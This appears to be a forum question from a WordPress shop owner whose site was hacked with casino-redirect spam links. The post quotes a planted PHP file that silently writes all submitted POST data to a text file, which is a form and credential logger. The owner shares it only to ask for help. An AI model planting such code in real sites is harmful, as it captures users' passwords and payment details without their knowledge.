I was facing a hack
My website is not hosted on a server but shared hosting, If server is hacked I cannot do anything. My Question is not about how to safeguard the server, but is the below code is only file that should be removed or not, Is the below file is what allowed hack ?? how much does that code can alter my site. I don't have a hacked server but a hacked wordpress site please don't mark it duplicate. I want to safeguard wordpress if possible
what happened is that links were created with my domain as parent for example www.example.com/bellagio and this redirected to a casino site. I don't have a file or folder named bellagio and I certainly don't want to show a casino page.
Earlier it was hard to guess so I deleted each and every file in my wordpress site, I reloaded the account throgh hosting panel, I was going to do that again but then I found this file named " webftf67rty6t7fi7r6a.txt " and I am pretty sure I did not created it.
The code in the file seems a php code which is
<?php
$filename = "webftf67rty6t7fi7r6a.txt";
foreach($_POST as $key => $value)
{
file_put_contents($filename, "$key: $value\n", FILE_APPEND);
}
file_put_contents($filename, "----------\n", FILE_APPEND);
?>
what more Should I look for, will removing this file will remove access of blocker ? should I check all folders for same file name/different file name ? Is it because I use godaddy ?
Is it for the code used to hack my site ? it was in wp-contents folder so how to prevent this from happening again ?
I run a ecommerce store so it needs to go and yes any detail what this hack can do at most ?
Thank you if you take time to answer my queries, I am novice at these things :(
